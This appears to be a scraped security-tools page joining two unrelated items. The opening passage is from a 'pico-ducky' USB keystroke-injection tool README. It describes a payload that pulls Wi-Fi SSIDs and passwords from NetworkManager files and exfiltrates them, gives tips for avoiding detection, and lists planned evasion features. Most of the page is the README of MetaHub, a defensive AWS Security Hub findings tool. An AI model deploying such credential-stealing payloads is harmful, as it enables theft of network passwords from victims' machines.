NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R β€” December 25th 2023 at 11:30


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs: YOUR context, identifying ownership, and calculate an impact scoring based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanners (like Prowler).

MetaHub describe your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to that instance itself but also its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment and application. Based on those calculations and in addition to the information from the security findings affecting the resource all together, MetaHub will generate a Scoring for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for a an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account cloudtrail, and impact



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module has the capability to retrieve information from the affected resources, affected accounts, and every associated resources. The context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default config and tags are enabled, but you can change this behavior using the option --context (for enabling all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anyting related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource type supports this API. You can check supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical Cloudtrail events related to the affected resource, such as creating events.

The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.

For example for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is runnning, like if it's part of an AWS Organizations, information about their contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way, it is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.

Possible Statuses Value Description
ο”΄ effectively-public 100% The resource is effectively public from the Internet.
 restricted-public 40% The resource is public, but there is a restriction like a Security Group.
 unrestricted-private 30% The resource is private but unrestricted, like an open security group.
 launch-public 10% These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet.
 restricted 0% The resource is restricted.
ο”΅ unknown - The resource couldn't be checked

Access

Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.

Possible Statuses Value Description
ο”΄ unrestricted 100% The principal is unrestricted, without any condition or restriction.
ο”΄ untrusted-principal 70% The principal is an AWS Account, not part of your trusted accounts.
 unrestricted-principal 40% The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks.
 cross-account-principal 30% The principal is from another AWS account.
 unrestricted-actions 30% The actions are defined using wildcards.
 dangerous-actions 30% Some dangerous actions are defined as part of this policy.
 unrestricted-service 10% The policy allows an AWS service as principal without restriction.
 restricted 0% The policy is restricted.
ο”΅ unknown - The policy couldn't be checked.

Encryption

Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest and in_transit encryption configuration are both enabled.

Possible Statuses Value Description
ο”΄ unencrypted 100% The resource is not fully encrypted.
 encrypted 0% The resource is fully encrypted including any of it's associations.
ο”΅ unknown - The resource encryption couldn't be checked.

Status

Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.

Possible Statuses Value Description
 attached 100% The resource supports attachment and is attached.
 running 100% The resource supports running and is running.
 enabled 100% The resource supports enabled and is enabled.
 not-attached 0% The resource supports attachment, and it is not attached.
 not-running 0% The resource supports running and it is not running.
 not-enabled 0% The resource supports enabled and it is not enabled.
ο”΅ unknown - The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
 production 100% It is a production resource.
 staging 30% It is a staging resource.
 development 0% It is a development resource.
ο”΅ unknown - The resource couldn't be checked for enviroment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).

Possible Statuses Value Description
ο”΅ unknown - The resource couldn't be checked for application.

Findings Soring

As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Created enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to repostiory dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tagging for MetaHub containers are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior

You need first to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings or --enrich-findings as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all findings titles together under each affected resource and the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column
  • You can group/ungroup findings
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.

Β 

XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE filtering for AWS Security Hub using the option --sh-filters, the same way you would filter using AWS CLI but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template Security Hub Filtering using YAML templates.

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW

If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three finding each making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
